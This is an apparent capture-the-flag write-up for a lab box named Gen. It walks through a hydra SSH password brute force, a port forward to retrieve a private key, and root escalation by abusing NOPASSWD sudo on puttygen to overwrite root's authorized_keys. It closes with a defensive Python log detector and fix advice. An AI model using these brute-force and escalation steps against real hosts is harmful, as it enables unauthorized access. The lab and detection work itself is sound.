# Lab setup
Download: Gen
NAT, IP: 192.168.1.175
# Penetration process
# Initial information gathering
```
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey:
|   256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA)
|_  256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519)
80/tcp open  http    Apache httpd 2.4.57 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.57 (Debian)
```
http://192.168.1.175/note.txt
Got a piece of information:
```
Hello Mark,
- We have secured the internal server and it is now available on port 9999.
- There you will find Peter private key (don't forget that it has a different format and he has to convert it for it to work).
Thanks.
```
Users: mark and peter. Let's brute-force the passwords:
```
┌──(root㉿kali)-[~]
└─# hydra -t 64 -l mark -P pass ssh://192.168.1.175 -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-06-02 04:01:10
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 64 tasks per 1 server, overall 64 tasks, 5000 login tries (l:1/p:5000), ~79 tries per task
[DATA] attacking ssh://192.168.1.175:22/
[STATUS] 351.00 tries/min, 351 tries in 00:01h, 4676 to do in 00:14h, 37 active
[22][ssh] host: 192.168.1.175 login: mark password: genesis
```
Logging in over SSH shows a warning and no shell is given. The note already told us port 9999 is reachable internally, so set up port forwarding: `ssh -L 9999:127.0.0.1:9999 mark@192.168.1.175`
Per the note, Peter's private key is there: http://127.0.0.1:9999/id_rsa.ppk
`apt install -y putty-tools`
Then convert the key format with puttygen: `puttygen id_rsa.ppk -O private-openssh -o id_rsa`
# Privilege escalation
```
peter@gen:~$ su mark
Contraseña:
mark@gen:/home/peter$ sudo -l
Matching Defaults entries for mark on gen:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User mark may run the following commands on gen:
    (root) NOPASSWD: /usr/bin/puttygen
mark@gen:/home/peter$ cd ~
mark@gen:~$ puttygen -t rsa -o id_rsa -O private-openssh
+++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Enter passphrase to save key:
Re-enter passphrase to verify:
mark@gen:~$ sudo -u root /usr/bin/puttygen id_rsa -o /root/.ssh/authorized_keys -O public-openssh
mark@gen:~$ chmod 600 id_rsa
mark@gen:~$ ssh -i id_rsa root@localhost
The authenticity of host 'localhost (::1)' can't be established.
ED25519 key fingerprint is SHA256:4K6G5c0oerBJXgd6BnT2Q3J+i/dOR4+6rQZf20TIk/U.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'localhost' (ED25519) to the list of known hosts.
root@gen:~# find / -name user.txt -o -name root.txt |xargs cat
f003a3bc3ff27072d6ac2c7a1ab63254
d045787a2743570b0dc1aea01fc952ce
```
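As an added example (not part of the original writeup), here is a small Python detector for the two noisy steps of this box run over constructed auth.log lines: the SSH password brute force from the hydra step, and the NOPASSWD sudo puttygen call that writes root's authorized_keys. The log lines, host name, source IP and failure threshold are all constructed assumptions.

```python
import re
from collections import Counter

# Constructed sample auth.log lines (not captured from the box) modelling
# the events in this writeup: a burst of failed SSH logins for mark, then
# a sudo puttygen invocation writing /root/.ssh/authorized_keys.
SAMPLE_AUTH_LOG = """\
Jun  2 04:01:11 gen sshd[1201]: Failed password for mark from 10.0.0.5 port 50001 ssh2
Jun  2 04:01:11 gen sshd[1202]: Failed password for mark from 10.0.0.5 port 50002 ssh2
Jun  2 04:01:12 gen sshd[1203]: Failed password for mark from 10.0.0.5 port 50003 ssh2
Jun  2 04:01:12 gen sshd[1204]: Failed password for mark from 10.0.0.5 port 50004 ssh2
Jun  2 04:01:13 gen sshd[1205]: Failed password for mark from 10.0.0.5 port 50005 ssh2
Jun  2 04:01:14 gen sshd[1206]: Accepted password for mark from 10.0.0.5 port 50006 ssh2
Jun  2 04:09:30 gen sudo:     mark : TTY=pts/0 ; PWD=/home/mark ; USER=root ; COMMAND=/usr/bin/puttygen id_rsa -o /root/.ssh/authorized_keys -O public-openssh
Jun  2 04:10:02 gen sshd[1300]: Accepted publickey for root from ::1 port 40000 ssh2: RSA SHA256:placeholder
"""

# sshd failed-login line: captures (user, source address)
FAILED_RE = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\S+)")
# sudo audit line: captures (invoking user, target user, full command)
SUDO_RE = re.compile(r"sudo:\s+(\S+) : .*?USER=(\S+) ; COMMAND=(.*)$")
# any command line that names an authorized_keys file as an argument
KEY_PATH_RE = re.compile(r"\.ssh/authorized_keys")


def detect(log_text, failed_threshold=5):
    """Return alert strings for (a) a source that fails login for one user
    at least `failed_threshold` times within the supplied log slice and
    (b) any sudo command run as root whose arguments name authorized_keys,
    which is how a write-anywhere binary like puttygen -o becomes root."""
    alerts = []
    failures = Counter()
    for line in log_text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            failures[(m.group(1), m.group(2))] += 1
            continue
        m = SUDO_RE.search(line)
        if m and m.group(2) == "root" and KEY_PATH_RE.search(m.group(3)):
            binary = m.group(3).split()[0]
            alerts.append(f"sudo-authorized-keys-write user={m.group(1)} cmd={binary}")
    for (user, src), n in failures.items():
        if n >= failed_threshold:
            alerts.append(f"ssh-bruteforce user={user} src={src} failures={n}")
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_AUTH_LOG):
        print(alert)
```

The fix on the host side is to drop the NOPASSWD rule for puttygen (or any binary that takes an arbitrary output path) and, for the brute force, to rate-limit SSH with fail2ban or equivalent.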